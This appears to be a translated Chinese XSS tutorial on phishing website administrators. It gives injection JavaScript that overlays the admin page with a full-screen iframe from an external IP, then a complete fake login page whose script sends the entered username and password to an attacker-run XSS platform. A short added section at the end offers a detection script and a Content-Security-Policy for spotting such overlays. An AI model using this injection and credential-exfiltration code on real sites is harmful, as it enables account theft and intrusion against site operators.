Write your own phishing page that looks exactly like the original site's backend login page.
JS loads an iframe that covers 100% of the original page and prompts that the login has timed out and the user must log in again. Because it is loaded in an iframe, the URL does not change; after the phishing succeeds, redirect back to /admin/index.php. Because the target's session has not expired, this imitates a normal successful login very closely.
Inject the following code:
setTimeout(function(){
    parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"http://59.65.232.237/diaoyu.html\" frameBorder=0 scrolling=no></iframe>");
    setTimeout(function(){
        document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");
    },100);
    setTimeout(function(){
        parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");
    },100);
},1000);
Build the diaoyu.html page on the server. The code is as follows:
<html>
<head>
<meta charset="utf-8">
<title>Xss平台-免費xss測試平台,xss源碼,xss代碼</title>
<meta name="keywords" content="XSS攻擊,XSS平台,XSS跨站,XSS代碼,XSS教程,XSS平台邀請碼,免費xss平台,xss測試平台,跨站平台,跨站攻擊" />
<meta name="description" content="XSS攻擊,XSS平台,XSS跨站,XSS代碼,XSS教程,XSS平台邀請碼,免費xss平台,xss測試平台,跨站平台,跨站攻擊" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="http://xss.fbisb.com/themes/default/css/bootstrap.min.css">
<link rel="stylesheet" href="http://xss.fbisb.com/themes/default/css/bootstrap-theme.min.css">
<link rel="stylesheet" href="http://xss.fbisb.com/themes/default/css/css.css">
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://www.bootstrapcdn.com/bootstrap/2.3.1/js/bootstrap.min.js"></script>

<script>
function Login(){
    if($("#user").val()==""){
        ShowError("用戶名不能為空");
        return false;
    }
    if($("#pwd").val()==""){
        ShowError("密碼不能為空");
        return false;
    }
}
function ShowError(content){
    $("#contentShow").attr("class","error");
    $("#contentShow").html(content);
}
</script>

</head>
<body>
<div class="navbar navbar-fixed-top navbar-inverse">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="http://xss.fbisb.com/xss.php">Xss平台</a>
    </div>
    <div class="collapse navbar-collapse">
      <ul class="nav navbar-nav">
        <li class="active"><a href="http://xss.fbisb.com/xss.php">主頁</a></li>
        <li><a href="http://www.fbisb.com/">論壇</a></li>
        <li><a href="http://sgk.fbisb.com/">社工庫(已刪褲)</a></li>
        <li><a href="http://wooyun.fbisb.com/" class="menuToggle">wooyun漏洞平台</a></li>
        <li><a href="http://ip.fbisb.com/">ip定位</a></li>
      </ul>
      <ul class="nav navbar-nav navbar-right ng-scope" ng-controller="user_ctrl" id="header_me">
        <li>
          <a class="mr_15" wt-tracker="Header|Menu|Goto Signin" href="http://xss.fbisb.com/xss.php?do=login">登錄</a>
        </li>
        <li>
          <a href="http://xss.fbisb.com/xss.php?do=register" wt-tracker="Header|Menu|Goto Apply">注冊(無需邀請碼)</a>
        </li>
      </ul>
    </div><!--/.nav-collapse -->
  </div>
</div>
<div class="container">
  <form class="form-signin" action="http://xss.fbisb.com/xss.php?do=login&act=submit" method="post" onsubmit="return Login()">
    <div class="panel panel-default">
      <div class="panel-heading">登陸 (已開啟偽靜態 郵箱提醒 ^_^ )</div>
      <div class="panel-body">
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon">
              <i class="glyphicon glyphicon-user"></i>
            </span>
            <input class="form-control ng-pristine ng-invalid ng-invalid-required valid" type="text" placeholder="輸入用戶名/郵箱" name="user" id="user">
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon fs_17"><i class="glyphicon glyphicon-lock"></i></span>
            <input class="form-control ng-pristine ng-invalid ng-invalid-required valid" type="password" placeholder="輸入密碼" name="pwd" id="pwd">
          </div>
        </div>
        <button class="btn btn-lg btn-primary btn-block" type="submit">登陸</button>
      </div>
    </div>
  </form>
</div>
<br><center>聲明:僅用於攻防演練及教學測試用途,禁止非法使用!</center>

<center>
<script type="text/javascript">
/* created 2018/1/28 */
var cpro_id = "u3196815";
</script>
<script type="text/javascript" src="//cpro.baidustatic.com/cpro/ui/c.js"></script>
</center>
<script type="text/javascript">
function DataSend(user,pass)
{
    var url="http://xss平台地址";
    var xmlhttp1=new XMLHttpRequest();
    xmlhttp1.open("POST",url,true);
    xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    xmlhttp1.send("username="+user+"&password="+pass);
}
document.forms[0].onsubmit=function(){
    var username=document.getElementById('user').value;
    var password=document.getElementById('pwd').value;
    alert(username);
    alert(password);
    new Image().src="http://xssplat/?username="+username+" &password="+password; // the form's username and password are read here and sent to the platform
}
</script>
</body>
</html>
Demonstration:
Inject the iframe code wherever the XSS is (for convenience in the demo, the code is entered directly in the browser console):
The URL has not actually changed, but the page has already loaded the login code we built.
When we enter a username and password, the username and password are sent to the server. (In this test the username is displayed.)
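From the defender's side, the injected overlay has a recognisable shape: an iframe sized to 100% of the viewport whose src is a different origin, written into the document after it has loaded. The following is an added detection example, not code from the original page: a pure check that can be unit-tested offline, plus a MutationObserver hook that applies it to frames inserted at runtime. Assumed: the page origin and the report() callback are placeholders for your own site and telemetry.

```javascript
// Added detection example (not from the original page): flag iframes shaped like
// the injected phishing frame above, i.e. a full-viewport overlay on another origin.
function parseInlineStyle(style) {
  // "margin:0px;height:100%;width:100%;" -> { margin: "0px", height: "100%", width: "100%" }
  const out = {};
  for (const decl of String(style || "").split(";")) {
    const idx = decl.indexOf(":");
    if (idx < 0) continue;
    out[decl.slice(0, idx).trim().toLowerCase()] = decl.slice(idx + 1).trim().toLowerCase();
  }
  return out;
}
// True when the frame fills the viewport (100%, 100vw or 100vh on both axes)
// and its src resolves to an origin other than pageOrigin.
function isSuspiciousOverlayFrame(frame, pageOrigin) {
  const css = parseInlineStyle(frame.style);
  const full = (v) => v === "100%" || v === "100vw" || v === "100vh";
  if (!full(css.width) || !full(css.height)) return false;
  let origin;
  try {
    origin = new URL(frame.src || "", pageOrigin).origin;
  } catch (e) {
    return false; // unparsable src: nothing navigable to overlay with
  }
  return origin !== new URL(pageOrigin).origin;
}
// Run the check over a list of frame descriptors; returns the offending srcs.
function findOverlayFrames(frames, pageOrigin) {
  return frames.filter((f) => isSuspiciousOverlayFrame(f, pageOrigin)).map((f) => f.src);
}
// Browser hook: document.writeln from the injected script rebuilds the whole tree,
// so inspect every added subtree for iframes and hand matches to report()
// (placeholder for your telemetry). Returns null outside a browser.
function installOverlayFrameWatch(report) {
  if (typeof MutationObserver === "undefined" || typeof document === "undefined") return null;
  const obs = new MutationObserver((records) => {
    for (const r of records) {
      for (const node of r.addedNodes) {
        const frames = node.nodeName === "IFRAME" ? [node]
          : node.querySelectorAll ? Array.from(node.querySelectorAll("iframe")) : [];
        for (const el of frames) {
          const f = { src: el.getAttribute("src") || "", style: el.getAttribute("style") || "" };
          if (isSuspiciousOverlayFrame(f, location.origin)) report(f);
        }
      }
    }
  });
  obs.observe(document, { childList: true, subtree: true });
  return obs;
}
```

A Content-Security-Policy with `frame-src 'self'` blocks the injected frame's foreign src outright; the watcher above is for spotting the pattern where such a policy is not yet deployed.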